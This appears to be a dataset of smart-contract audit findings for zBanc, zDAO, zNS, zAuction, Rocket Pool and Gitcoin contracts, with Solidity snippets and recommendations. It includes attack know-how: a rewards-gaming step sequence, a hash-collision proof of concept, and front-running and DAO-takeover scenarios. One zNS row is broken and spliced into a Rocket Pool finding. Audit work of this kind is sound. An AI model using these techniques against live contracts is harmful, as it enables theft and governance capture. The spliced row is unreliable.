overlaps).",,"```\\nfunction registerAddress(bytes32 \\_contractName, address \\_contractAddress)\\n public\\n ownerOnly\\n validAddress(\\_contractAddress)\\n{\\n```\\n" +zBanc - DynamicLiquidTokenConverter consider using PPM_RESOLUTION instead of hardcoding integer literals,low,`getMarketCap` calculates the reserve's market capitalization as `reserveBalance * `1e6` / weight` where `1e6` should be expressed as the constant `PPM_RESOLUTION`.\\n```\\nfunction getMarketCap(IERC20Token \\_reserveToken)\\n public\\n view\\n returns(uint256)\\n{\\n Reserve storage reserve = reserves[\\_reserveToken];\\n return reserveBalance(\\_reserveToken).mul(1e6).div(reserve.weight);\\n}\\n```\\n,Avoid hardcoding integer literals directly into source code when there is a better expression available. In this case `1e6` is used because weights are denoted in percent to base `PPM_RESOLUTION` (=100%).,,```\\nfunction getMarketCap(IERC20Token \\_reserveToken)\\n public\\n view\\n returns(uint256)\\n{\\n Reserve storage reserve = reserves[\\_reserveToken];\\n return reserveBalance(\\_reserveToken).mul(1e6).div(reserve.weight);\\n}\\n```\\n +zBanc - DynamicLiquidTokenConverter avoid potential converter type overlap with bancor Acknowledged,low,"The system is forked frombancorprotocol/contracts-solidity. As such, it is very likely that security vulnerabilities reported to bancorprotocol upstream need to be merged into the zer0/zBanc fork if they also affect this codebase. There is also a chance that security fixes will only be available with feature releases or that the zer0 development team wants to merge upstream features into the zBanc codebase.\\nzBanc introduced `converterType=3` for the `DynamicLiquidTokenConverter` as `converterType=1` and `converterType=2` already exist in the bancorprotocol codebase. 
Now, since it is unclear if `DynamicLiquidTokenConverter` will be merged into bancorprotocol there is a chance that bancor introduces new types that overlap with the `DynamicLiquidTokenConverter` converter type (3). It is therefore suggested to map the `DynamicLiquidTokenConverter` to a converterType that is unlikely to create an overlap with the system it was forked from. E.g. use converter type id `1001` instead of `3` (Note: converterType is a uint16).\\nNote that the current master of the bancorprotocol already appears to define converterType 3 and 4: https://github.com/bancorprotocol/contracts-solidity/blob/5f4c53ebda784751c3a90b06aa2c85e9fdb36295/solidity/test/helpers/Converter.js#L51-L54\\nThe new custom converter\\n```\\nfunction converterType() public pure override returns (uint16) {\\n return 3;\\n}\\n```\\n\\nConverterTypes from the bancor base system\\n```\\nfunction converterType() public pure override returns (uint16) {\\n return 1;\\n}\\n```\\n\\n```\\n\\*/\\nfunction converterType() public pure override returns (uint16) {\\n return 2;\\n}\\n```\\n",Choose a converterType id for this custom implementation that does not overlap with the codebase the system was forked from. e.g. 
`uint16(-1)` or `1001` instead of `3` which might already be used upstream.,,```\\nfunction converterType() public pure override returns (uint16) {\\n return 3;\\n}\\n```\\n +zDAO Token - Specification violation - Snapshots are never taken Partially Addressed,high,"Resolution\\nAddressed with zer0-os/[email protected]81946d4 by exposing the `_snapshot()` method to a dedicated snapshot role (likely to be a DAO) and the owner of the contract.\\nWe would like to note that we informed the client that depending on how the snapshot method is used and how predictably snapshots are consumed this might open up a frontrunning vector where someone observing that a `_snapshot()` is about to be taken might sandwich the snapshot call, accumulate a lot of stake (via 2nd markets, lending platforms), and returning it right after it's been taken. The risk of losing funds may be rather low (especially if performed by a miner) and the benefit from a DAO proposal using this snapshot might outweigh it. It is still recommended to increase the number of snapshots taken or take them on a regular basis (e.g. with every first transaction to the contract in a block) to make it harder to sandwich the snapshot taking.\\nAccording to the zDAO Token specification the DAO token should implement a snapshot functionality to allow it being used for DAO governance votings.\\nAny transfer, mint, or burn operation should result in a snapshot of the token balances of involved users being taken.\\nWhile the corresponding functionality is implemented and appears to update balances for snapshots, `_snapshot()` is never called, therefore, the snapshot is never taken. e.g. 
attempting to call `balanceOfAt` always results in an error as no snapshot is available.\\n```\\ncontract ZeroDAOToken is\\n OwnableUpgradeable,\\n ERC20Upgradeable,\\n ERC20PausableUpgradeable,\\n ERC20SnapshotUpgradeable\\n{\\n```\\n\\n```\\n\\_updateAccountSnapshot(sender);\\n```\\n\\nNote that this is an explicit requirement as per specification but unit tests do not seem to attempt calls to `balanceOfAt` at all.",Actually, take a snapshot by calling `_snapshot()` once per block when executing the first transaction in a new block. Follow the OpenZeppelin documentation for ERC20Snapshot.,,"```\\ncontract ZeroDAOToken is\\n OwnableUpgradeable,\\n ERC20Upgradeable,\\n ERC20PausableUpgradeable,\\n ERC20SnapshotUpgradeable\\n{\\n```\\n" +zDAO-Token - Revoking vesting tokens right before cliff period expiration might be delayed/front-runned,low,"The owner of `TokenVesting` contract has the right to revoke the vesting of tokens for any `beneficiary`. By doing so, the amount of tokens that are already vested and weren't released yet are being transferred to the `beneficiary`, and the rest are being transferred to the owner. The `beneficiary` is expected to receive zero tokens in case the revocation transaction was executed before the cliff period is over. Although unlikely, the `beneficiary` may front run this revocation transaction by delaying the revocation (and) or inserting a release transaction right before that, thus withdrawing the vested amount.\\n```\\nfunction release(address beneficiary) public {\\n uint256 unreleased = getReleasableAmount(beneficiary);\\n require(unreleased > 0, ""Nothing to release"");\\n\\n TokenAward storage award = getTokenAwardStorage(beneficiary);\\n award.released += unreleased;\\n\\n targetToken.safeTransfer(beneficiary, unreleased);\\n\\n emit Released(beneficiary, unreleased);\\n}\\n\\n/\\*\\*\\n \\* @notice Allows the owner to revoke the vesting. 
Tokens already vested\\n \\* are transfered to the beneficiary, the rest are returned to the owner.\\n \\* @param beneficiary Who the tokens are being released to\\n \\*/\\nfunction revoke(address beneficiary) public onlyOwner {\\n TokenAward storage award = getTokenAwardStorage(beneficiary);\\n\\n require(award.revocable, ""Cannot be revoked"");\\n require(!award.revoked, ""Already revoked"");\\n\\n // Figure out how many tokens were owed up until revocation\\n uint256 unreleased = getReleasableAmount(beneficiary);\\n award.released += unreleased;\\n\\n uint256 refund = award.amount - award.released;\\n\\n // Mark award as revoked\\n award.revoked = true;\\n award.amount = award.released;\\n\\n // Transfer owed vested tokens to beneficiary\\n targetToken.safeTransfer(beneficiary, unreleased);\\n // Transfer unvested tokens to owner (revoked amount)\\n targetToken.safeTransfer(owner(), refund);\\n\\n emit Released(beneficiary, unreleased);\\n emit Revoked(beneficiary, refund);\\n}\\n```\\n","The issue described above is possible, but very unlikely. However, the `TokenVesting` owner should be aware of that, and make sure not to revoke vested tokens closely to cliff period ending.",,"```\\nfunction release(address beneficiary) public {\\n uint256 unreleased = getReleasableAmount(beneficiary);\\n require(unreleased > 0, ""Nothing to release"");\\n\\n TokenAward storage award = getTokenAwardStorage(beneficiary);\\n award.released += unreleased;\\n\\n targetToken.safeTransfer(beneficiary, unreleased);\\n\\n emit Released(beneficiary, unreleased);\\n}\\n\\n/\\*\\*\\n \\* @notice Allows the owner to revoke the vesting. 
Tokens already vested\\n \\* are transfered to the beneficiary, the rest are returned to the owner.\\n \\* @param beneficiary Who the tokens are being released to\\n \\*/\\nfunction revoke(address beneficiary) public onlyOwner {\\n TokenAward storage award = getTokenAwardStorage(beneficiary);\\n\\n require(award.revocable, ""Cannot be revoked"");\\n require(!award.revoked, ""Already revoked"");\\n\\n // Figure out how many tokens were owed up until revocation\\n uint256 unreleased = getReleasableAmount(beneficiary);\\n award.released += unreleased;\\n\\n uint256 refund = award.amount - award.released;\\n\\n // Mark award as revoked\\n award.revoked = true;\\n award.amount = award.released;\\n\\n // Transfer owed vested tokens to beneficiary\\n targetToken.safeTransfer(beneficiary, unreleased);\\n // Transfer unvested tokens to owner (revoked amount)\\n targetToken.safeTransfer(owner(), refund);\\n\\n emit Released(beneficiary, unreleased);\\n emit Revoked(beneficiary, refund);\\n}\\n```\\n" +zDAO-Token - Vested tokens revocation depends on claiming state,low,"The owner of the `TokenVesting` contract can revoke the vesting of tokens for any beneficiary by calling `TokenVesting.revoke` only for tokens that have already been claimed using `MerkleTokenVesting.claimAward`. Although anyone can call `MerkleTokenVesting.claimAward` for a given beneficiary, in practice it is mostly the beneficiary's responsibility. This design decision, however, incentivizes the beneficiary to delay the call to `MerkleTokenVesting.claimAward` up to the point when he wishes to cash out, to avoid potential revocation. 
To revoke vesting tokens the owner will have to claim the award on the beneficiary's behalf first (which might be a gas burden), then call `TokenVesting.revoke`.\\n```\\nfunction revoke(address beneficiary) public onlyOwner {\\n TokenAward storage award = getTokenAwardStorage(beneficiary);\\n\\n require(award.revocable, ""Cannot be revoked"");\\n require(!award.revoked, ""Already revoked"");\\n\\n // Figure out how many tokens were owed up until revocation\\n uint256 unreleased = getReleasableAmount(beneficiary);\\n award.released += unreleased;\\n\\n uint256 refund = award.amount - award.released;\\n\\n // Mark award as revoked\\n award.revoked = true;\\n award.amount = award.released;\\n\\n // Transfer owed vested tokens to beneficiary\\n targetToken.safeTransfer(beneficiary, unreleased);\\n // Transfer unvested tokens to owner (revoked amount)\\n targetToken.safeTransfer(owner(), refund);\\n\\n emit Released(beneficiary, unreleased);\\n emit Revoked(beneficiary, refund);\\n}\\n```\\n","Make sure that the potential owner of a `TokenVesting` contract is aware of this potential issue, and has the required processes in place to handle it.",,"```\\nfunction revoke(address beneficiary) public onlyOwner {\\n TokenAward storage award = getTokenAwardStorage(beneficiary);\\n\\n require(award.revocable, ""Cannot be revoked"");\\n require(!award.revoked, ""Already revoked"");\\n\\n // Figure out how many tokens were owed up until revocation\\n uint256 unreleased = getReleasableAmount(beneficiary);\\n award.released += unreleased;\\n\\n uint256 refund = award.amount - award.released;\\n\\n // Mark award as revoked\\n award.revoked = true;\\n award.amount = award.released;\\n\\n // Transfer owed vested tokens to beneficiary\\n targetToken.safeTransfer(beneficiary, unreleased);\\n // Transfer unvested tokens to owner (revoked amount)\\n targetToken.safeTransfer(owner(), refund);\\n\\n emit Released(beneficiary, unreleased);\\n emit Revoked(beneficiary, refund);\\n}\\n```\\n" 
+zNS - Domain bid might be approved by non owner account,high,"The spec allows anyone to place a bid for a domain, while only parent domain owners are allowed to approve a bid. Bid placement is actually enforced and purely informational. In practice, `approveDomainBid` allows any parent domain owner to approve bids (signatures) for any other domain even if they do not own it. Once approved, anyone can call `fulfillDomainBid` to create a domain.\\n```\\nfunction approveDomainBid(\\n uint256 parentId,\\n string memory bidIPFSHash,\\n bytes memory signature\\n) external authorizedOwner(parentId) {\\n bytes32 hashOfSig = keccak256(abi.encode(signature));\\n approvedBids[hashOfSig] = true;\\n emit DomainBidApproved(bidIPFSHash);\\n}\\n```\\n",Resolution\\nAddressed with zer0-os/[email protected] by storing the domain request data on-chain.\\nConsider adding a validation check that allows only the parent domain owner to approve bids on one of its domains. Reconsider the design of the system introducing more on-chain guarantees for bids.,,"```\\nfunction approveDomainBid(\\n uint256 parentId,\\n string memory bidIPFSHash,\\n bytes memory signature\\n) external authorizedOwner(parentId) {\\n bytes32 hashOfSig = keccak256(abi.encode(signature));\\n approvedBids[hashOfSig] = true;\\n emit DomainBidApproved(bidIPFSHash);\\n}\\n```\\n" +"zAuction, zNS - Bids cannot be cancelled, never expire, and the auction lifecycle is unclear",high,"The lifecycle of a bid both for `zAuction` and `zNS` is not clear, and has many flaws.\\n`zAuction` - Consider the case where a bid is placed, then the underlying asset in being transferred to a new owner. 
The new owner can now force to sell the asset even though it might not be relevant anymore.\\n`zAuction` - Once a bid was accepted and the asset was transferred, all other bids need to be invalidated automatically, otherwise an old bid might be accepted even after the formal auction is over.\\n`zAuction`, `zNS` - There is no way for the bidder to cancel an old bid. That might be useful in the event of a significant change in market trend, where the old pricing is no longer relevant. Currently, in order to cancel a bid, the bidder can either withdraw his ether balance from the `zAuctionAccountant`, or disapprove `WETH` which requires an extra transaction that might be front-run by the seller.\\n```\\nfunction acceptBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n accountant.Exchange(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit BidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n```\\n\\n```\\n function fulfillDomainBid(\\n uint256 parentId,\\n uint256 bidAmount,\\n uint256 royaltyAmount,\\n string memory bidIPFSHash,\\n string memory name,\\n string memory metadata,\\n bytes memory signature,\\n bool lockOnCreation,\\n address recipient\\n) external {\\n bytes32 recoveredBidHash = createBid(parentId, bidAmount, bidIPFSHash, name);\\n address recoveredBidder = recover(recoveredBidHash, signature);\\n require(recipient == recoveredBidder, ""ZNS: bid info doesnt match/exist"");\\n bytes32 hashOfSig = keccak256(abi.encode(signature));\\n require(approvedBids[hashOfSig] == true, 
""ZNS: has been fullfilled"");\\n infinity.safeTransferFrom(recoveredBidder, controller, bidAmount);\\n uint256 id = registrar.registerDomain(parentId, name, controller, recoveredBidder);\\n registrar.setDomainMetadataUri(id, metadata);\\n registrar.setDomainRoyaltyAmount(id, royaltyAmount);\\n registrar.transferFrom(controller, recoveredBidder, id);\\n if (lockOnCreation) {\\n registrar.lockDomainMetadataForOwner(id);\\n }\\n approvedBids[hashOfSig] = false;\\n emit DomainBidFulfilled(\\n metadata,\\n name,\\n recoveredBidder,\\n id,\\n parentId\\n );\\n}\\n```\\n","Consider adding an expiration field to the message signed by the bidder both for `zAuction` and `zNS`. Consider adding auction control, creating an `auctionId`, and have users bid on specific auctions. By adding this id to the signed message, all other bids are invalidated automatically and users would have to place new bids for a new auction. Optionally allow users to cancel bids explicitly.\\n",,"```\\nfunction acceptBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n accountant.Exchange(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit BidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n```\\n" +zNS - Insufficient protection against replay attacks,high,"There is no dedicated data structure to prevent replay attacks on `StakingController`. 
`approvedBids` mapping offers only partial mitigation, due to the fact that after a domain bid is fulfilled, the only mechanism in place to prevent a replay attack is the `Registrar` contract that might be replaced in the case where `StakingController` is being re-deployed with a different `Registrar` instance. Additionally, the digital signature used for domain bids does not identify the buyer request uniquely enough. The bidder's signature could be replayed in future similar contracts that are deployed with a different registrar or in a different network.\\n```\\nfunction createBid(\\n uint256 parentId,\\n uint256 bidAmount,\\n string memory bidIPFSHash,\\n string memory name\\n) public pure returns(bytes32) {\\n return keccak256(abi.encode(parentId, bidAmount, bidIPFSHash, name));\\n}\\n```\\n","Consider adding a dedicated mapping to store a unique identifier of a bid, as well as adding `address(this)`, `block.chainId`, `registrar` and `nonce` to the message that is being signed by the bidder.",,"```\\nfunction createBid(\\n uint256 parentId,\\n uint256 bidAmount,\\n string memory bidIPFSHash,\\n string memory name\\n) public pure returns(bytes32) {\\n return keccak256(abi.encode(parentId, bidAmount, bidIPFSHash, name));\\n}\\n```\\n" +zNS - domain name collisions,high,"Domain registration accepts an empty (zero-length) name. This may allow a malicious entity to register two different NFT's for the same visually indistinguishable text representation of a domain. Similar to this, the domain name is mapped to an NFT via a subgraph that connects parent names to the new subdomain using a domain separation character (dot/slash/…). 
Someone might be able to register `a.b` to `cats.cool` which might resolve to the same domain as if someone registers `cats.cool.a` and then `cats.cool.a.b`.\\n`0/cats/` = `0xfe`\\n`0/cats/ refund NETH]\\n[burn NETH for ETH]\\n// rest of code wait 14 days\\n[withdraw stake OR start again creating Minipools, claiming rewards while the Minipools are dissolved right after, freeing the ETH]\\n```\\n\\nBy staking just before claiming, the node effectively can earn rewards for 2 reward periods by only staking RPL for the duration of one period (claim the previous period, leave it in for 14 days, claim another period, withdraw).\\nThe stake can be withdrawn at the earliest 14 days after staking. However, it can be added back at any time, and the stake addition takes effect immediately. This allows for optimizing the staking reward as follows (assuming we front-run other claimers to maximize profits and perform all transactions in one block):\\n```\\n[stake max effective amount for the number of minipools]\\n[claim() to claim the previous period even though we did not provide any stake for the duration]\\n[optionally dissolve Minipools unlocking ETH]\\n-- stake is locked for at least 14 days --\\n-- 14 days forward - new reward period started --\\n[claim() the period]\\n[withdraw() (leaving min pool stake OR everything if we dissolve all the Minipool)]\\n[lend RPL to other platforms and earn interest]\\n-- 14 days forward -new reward period started --\\n[get RPL back from another platform]\\n[stake & create minipools to inflate effective stake]\\n[claim()]\\n[optionally dissolve Minipools to unlock node ETH]\\n-- stake is locked for at least 14 days --\\n-- 14 days forward - new reward period started --\\n[claim() the period]\\n[withdraw() (leaving min pool stake OR everything if we dissolve all the Minipools)]\\n[lend RPL to other platforms and earn interest]\\n// rest of code\\n```\\n\\nNote that `withdraw()` can be called right at the time the new reward period 
starts:\\n```\\nrequire(block.number.sub(getNodeRPLStakedBlock(msg.sender)) >= rocketDAOProtocolSettingsRewards.getRewardsClaimIntervalBlocks(), ""The withdrawal cooldown period has not passed"");\\n// Get & check node's current RPL stake\\n```\\n\\nA node may choose to register and stake some RPL to collect rewards but never actually provide registered node duties, e.g., operating a Minipool.\\nNode shares for a passed reward epoch are unpredictable as nodes may change their stake (adding) after/before users claim their rewards.\\nA node can maximize its rewards by adding stake just before claiming it\\nA node can stake to claim rewards, wait 14 days, withdraw, lend on a platform and return the stake in time to claim the next period.",Review the incentive model for the RPL rewards. Consider adjusting it so that nodes that provide a service get a better share of the rewards. Consider accruing rewards for the duration the stake was provided instead of taking a snapshot whenever the node calls `claim()`. 
Require stake to be locked for > 14 days instead of >=14 days (withdraw()) or have users skip the first reward period after staking.,,"```\\n-- reward period ends -- front-run other claimers to maximize profits\\n[create x minipools]\\n[stake to max effective RPL for amount of minipools; locked for 14 days]\\n[claim rewards for inflated effective RPL stake]\\n[dissolve(), close() minipools -> refund NETH]\\n[burn NETH for ETH]\\n// rest of code wait 14 days\\n[withdraw stake OR start again creating Minipools, claiming rewards while the Minipools are dissolved right after, freeing the ETH]\\n```\\n" +Prefer using abi.encode in TokenDistributor,medium,"The method `_hashLeaf` is called when a user claims their airdrop.\\n```\\n// can we repoduce leaf hash included in the claim?\\nrequire(\\_hashLeaf(user\\_id, user\\_amount, leaf), 'TokenDistributor: Leaf Hash Mismatch.');\\n```\\n\\nThis method receives the `user_id` and the `user_amount` as arguments.\\n```\\n/\\*\\*\\n\\* @notice hash user\\_id + claim amount together & compare results to leaf hash \\n\\* @return boolean true on match\\n\\*/\\nfunction \\_hashLeaf(uint32 user\\_id, uint256 user\\_amount, bytes32 leaf) private returns (bool) {\\n```\\n\\nThese arguments are abi encoded and hashed together to produce a unique hash.\\n```\\nbytes32 leaf\\_hash = keccak256(abi.encodePacked(keccak256(abi.encodePacked(user\\_id, user\\_amount))));\\n```\\n\\nThis hash is checked against the third argument for equality.\\n```\\nreturn leaf == leaf\\_hash;\\n```\\n\\nIf the hash matches the third argument, it returns true and considers the provided `user_id` and `user_amount` are correct.\\nHowever, packing differently sized arguments may produce collisions.\\nThe Solidity documentation states that packing dynamic types will produce collisions, but this is also the case if packing `uint32` and `uint256`.\\nBelow there's an example showing that packing `uint32` and `uint256` in both orders can produce collisions with 
carefully picked values.\\n```\\nlibrary Encode {\\n function encode32Plus256(uint32 \\_a, uint256 \\_b) public pure returns (bytes memory) {\\n return abi.encodePacked(\\_a, \\_b);\\n }\\n \\n function encode256Plus32(uint256 \\_a, uint32 \\_b) public pure returns (bytes memory) {\\n return abi.encodePacked(\\_a, \\_b);\\n }\\n}\\n\\ncontract Hash {\\n function checkEqual() public pure returns (bytes32, bytes32) {\\n // Pack 1\\n uint32 a1 = 0x12345678;\\n uint256 b1 = 0x99999999999999999999999999999999999999999999999999999999FFFFFFFF;\\n \\n // Pack 2\\n uint256 a2 = 0x1234567899999999999999999999999999999999999999999999999999999999;\\n uint32 b2 = 0xFFFFFFFF;\\n \\n // Encode these 2 different values\\n bytes memory packed1 = Encode.encode32Plus256(a1, b1);\\n bytes memory packed2 = Encode.encode256Plus32(a2, b2);\\n \\n // Check if the packed encodings match\\n require(keccak256(packed1) == keccak256(packed2), ""Hash of representation should match"");\\n \\n // The hashes are the same\\n // 0x9e46e582607c5c6e05587dacf66d311c4ced0819378a41d4b4c5adf99d72408e\\n return (\\n keccak256(packed1),\\n keccak256(packed2)\\n );\\n }\\n}\\n```\\n\\nChanging `abi.encodePacked` to `abi.encode` in the library will make the transaction fail with error message `Hash of representation should match`.","Resolution\\nFixed in gitcoinco/governance#7\\nUnless there's a specific use case to use `abi.encodePacked`, you should always use `abi.encode`. You might need a few more bytes in the transaction data, but it prevents collisions. 
Similar fix can be achieved by using `uint256` for both values to be packed to prevent any possible collisions.",,"```\\n// can we repoduce leaf hash included in the claim?\\nrequire(\\_hashLeaf(user\\_id, user\\_amount, leaf), 'TokenDistributor: Leaf Hash Mismatch.');\\n```\\n" +Simplify claim tokens for a gas discount and less code,low,"The method `claimTokens` in `TokenDistributor` needs to do a few checks before it can distribute the tokens.\\nA few of these checks can be simplified and optimized.\\nThe method `hashMatch` can be removed because it's only used once and the contents can be moved directly into the parent method.\\n```\\n// can we reproduce the same hash from the raw claim metadata?\\nrequire(hashMatch(user\\_id, user\\_address, user\\_amount, delegate\\_address, leaf, eth\\_signed\\_message\\_hash\\_hex), 'TokenDistributor: Hash Mismatch.');\\n```\\n\\nBecause this method also uses a few other internal calls, they also need to be moved into the parent method.\\n```\\nreturn getDigest(claim) == eth\\_signed\\_message\\_hash\\_hex;\\n```\\n\\n```\\nhashClaim(claim)\\n```\\n\\nMoving the code directly in the parent method and removing them will improve gas costs for users.\\nThe structure `Claim` can also be removed because it's not used anywhere else in the code.",Consider simplifying `claimTokens` and remove unused methods.,,"```\\n// can we reproduce the same hash from the raw claim metadata?\\nrequire(hashMatch(user\\_id, user\\_address, user\\_amount, delegate\\_address, leaf, eth\\_signed\\_message\\_hash\\_hex), 'TokenDistributor: Hash Mismatch.');\\n```\\n" +Rename method _hashLeaf to something that represents the validity of the leaf,low,"The method `_hashLeaf` accepts 3 arguments.\\n```\\nfunction \\_hashLeaf(uint32 user\\_id, uint256 user\\_amount, bytes32 leaf) private returns (bool) {\\n```\\n\\nThe arguments `user_id` and `user_amount` are used to create a keccak256 hash.\\n```\\nbytes32 leaf\\_hash = 
keccak256(abi.encodePacked(keccak256(abi.encodePacked(user\\_id, user\\_amount))));\\n```\\n\\nThis hash is then checked if it matches the third argument.\\n```\\nreturn leaf == leaf\\_hash;\\n```\\n\\nThe result of the equality is returned by the method.\\nThe name of the method is confusing because it should say that it returns true if the leaf is considered valid.",Resolution\\nClosed because the method was removed in gitcoinco/governance#4\\nConsider renaming the method to something like `isValidLeafHash`.,,"```\\nfunction \\_hashLeaf(uint32 user\\_id, uint256 user\\_amount, bytes32 leaf) private returns (bool) {\\n```\\n" +Method returns bool but result is never used in TokenDistributor.claimTokens,low,"The method `_delegateTokens` is called when a user claims their tokens to automatically delegate the claimed tokens to their own address or to a different one.\\n```\\n\\_delegateTokens(user\\_address, delegate\\_address);\\n```\\n\\nThe method accepts the addresses of the delegator and the delegate and returns a boolean.\\n```\\n/\\*\\*\\n\\* @notice execute call on token contract to delegate tokens \\n\\* @return boolean true on success \\n\\*/\\nfunction \\_delegateTokens(address delegator, address delegatee) private returns (bool) {\\n GTCErc20 GTCToken = GTCErc20(token);\\n GTCToken.delegateOnDist(delegator, delegatee);\\n return true; \\n} \\n```\\n\\nBut this boolean is never used.",Remove the returned boolean because it's always returned as `true` anyway and the transaction will be a bit cheaper.,,"```\\n\\_delegateTokens(user\\_address, delegate\\_address);\\n```\\n" +Improve efficiency by using immutable in TreasuryVester,low,The `TreasuryVester` contract when deployed has a few fixed storage variables.\\n```\\ngtc = gtc\\_;\\n```\\n\\n```\\nvestingAmount = vestingAmount\\_;\\nvestingBegin = vestingBegin\\_;\\nvestingCliff = vestingCliff\\_;\\nvestingEnd = vestingEnd\\_;\\n```\\n\\nThese storage variables are defined in the contract.\\n```\\naddress 
public gtc;\\n```\\n\\n```\\nuint public vestingAmount;\\nuint public vestingBegin;\\nuint public vestingCliff;\\nuint public vestingEnd;\\n```\\n\\nBut they are never changed.,Resolution\\nFixed in gitcoinco/governance#5\\nConsider setting storage variables as `immutable` type for a considerable gas improvement.,,```\\ngtc = gtc\\_;\\n```\\n +RocketDaoNodeTrusted - DAO takeover during deployment/bootstrapping,high,"The initial deployer of the `RocketStorage` contract is set as the Guardian/Bootstrapping role. This guardian can bootstrap the TrustedNode and Protocol DAO, add members, upgrade components, change settings.\\nRight after deploying the DAO contract the member count is zero. The Guardian can now begin calling any of the bootstrapping functions to add members, change settings, upgrade components, interact with the treasury, etc. The bootstrapping configuration by the Guardian is unlikely to all happen within one transaction which might allow other parties to interact with the system while it is being set up.\\n`RocketDaoNodeTrusted` also implements a recovery mode that allows any registered node to invite themselves directly into the DAO without requiring approval from the Guardian or potential other DAO members as long as the total member count is below `daoMemberMinCount` (3). 
The Guardian itself is not counted as a DAO member as it is a supervisory role.\\n```\\n/\\*\\*\\*\\* Recovery \\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*/\\n \\n// In an explicable black swan scenario where the DAO loses more than the min membership required (3), this method can be used by a regular node operator to join the DAO\\n// Must have their ID, email, current RPL bond amount available and must be called by their current registered node account\\nfunction memberJoinRequired(string memory \\_id, string memory \\_email) override public onlyLowMemberMode onlyRegisteredNode(msg.sender) onlyLatestContract(""rocketDAONodeTrusted"", address(this)) {\\n // Ok good to go, lets add them\\n (bool successPropose, bytes memory responsePropose) = getContractAddress('rocketDAONodeTrustedProposals').call(abi.encodeWithSignature(""proposalInvite(string,string,address)"", \\_id, \\_email, msg.sender));\\n // Was there an error?\\n require(successPropose, getRevertMsg(responsePropose));\\n // Get the to automatically join as a member (by a regular proposal, they would have to manually accept, but this is no ordinary situation)\\n (bool successJoin, bytes memory responseJoin) = getContractAddress(""rocketDAONodeTrustedActions"").call(abi.encodeWithSignature(""actionJoinRequired(address)"", msg.sender));\\n // Was there an error?\\n require(successJoin, getRevertMsg(responseJoin));\\n}\\n```\\n\\nThis opens up a window during the bootstrapping phase where any Ethereum Address might be able to register as a node (RocketNodeManager.registerNode) if node registration is enabled (default=true) rushing into `RocketDAONodeTrusted.memberJoinRequired` adding themselves (up to 3 nodes) as trusted nodes to the DAO. The new DAO members can now take over the DAO by issuing proposals, waiting 2 blocks to vote/execute them (upgrade, change settings while Guardian is changing settings, etc.). 
The Guardian role can kick the new DAO members, however, they can invite themselves back into the DAO.\\n```\\nsetSettingBool(""node.registration.enabled"", true); \\n```\\n","Disable the DAO recovery mode during bootstrapping. Disable node registration by default and require the guardian to enable it. Ensure that `bootstrapDisable` (in both DAO contracts) performs sanity checks as to whether the DAO bootstrapping finished and permissions can effectively be revoked without putting the DAO at risk or in an irrecoverable state (enough members bootstrapped, vital configurations like registration and other settings are configured, …).",,"```\\n/\\*\\*\\*\\* Recovery \\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*/\\n \\n// In an explicable black swan scenario where the DAO loses more than the min membership required (3), this method can be used by a regular node operator to join the DAO\\n// Must have their ID, email, current RPL bond amount available and must be called by their current registered node account\\nfunction memberJoinRequired(string memory \\_id, string memory \\_email) override public onlyLowMemberMode onlyRegisteredNode(msg.sender) onlyLatestContract(""rocketDAONodeTrusted"", address(this)) {\\n // Ok good to go, lets add them\\n (bool successPropose, bytes memory responsePropose) = getContractAddress('rocketDAONodeTrustedProposals').call(abi.encodeWithSignature(""proposalInvite(string,string,address)"", \\_id, \\_email, msg.sender));\\n // Was there an error?\\n require(successPropose, getRevertMsg(responsePropose));\\n // Get the to automatically join as a member (by a regular proposal, they would have to manually accept, but this is no ordinary situation)\\n (bool successJoin, bytes memory responseJoin) = getContractAddress(""rocketDAONodeTrustedActions"").call(abi.encodeWithSignature(""actionJoinRequired(address)"", msg.sender));\\n // Was there an error?\\n require(successJoin, getRevertMsg(responseJoin));\\n}\\n```\\n" +RocketDaoNodeTrustedActions - 
Incomplete implementation of member challenge process,high,"Any registered (even untrusted) node can challenge a trusted DAO node to respond. The challenge is initiated by calling `actionChallengeMake`. Trusted nodes can challenge for free, other nodes have to provide `members.challenge.cost` as a tribute to the Ethereum gods. The challenged node must call `actionChallengeDecide` before `challengeStartBlock + members.challenge.window` blocks are over (default approx 7 days). However, the Golang codebase does not actively monitor for the `ActionChallengeMade` event, nor does the node - regularly - check if it is being challenged. Means to respond to the challenge (calling `actionChallengeDecide` to stop the challenge) are not implemented.\\nNodes do not seem to monitor `ActionChallengeMade` events so that they could react to challenges\\nNodes do not implement `actionChallengeDecide` and, therefore, cannot successfully stop a challenge\\nFunds/Tribute sent along with the challenge will be locked forever in the `RocketDAONodeTrustedActions` contract. There's no means to recover the funds.\\nIt is questionable whether the incentives are aligned well enough for anyone to challenge stale nodes. The default of `1 eth` compared to the risk of the ""malicious"" or ""stale"" node exiting themselves is quite high. The challenger is not incentivized to challenge someone other than for taking over the DAO. If the tribute is too low, this might incentivize users to grief trusted nodes and force them to close a challenge.\\nRequiring that the challenge initiator is a different registered node than the challenge finalizer is a weak protection since the system is open to anyone to register as a node (even without depositing any funds.)\\nblock time is subject to fluctuations. 
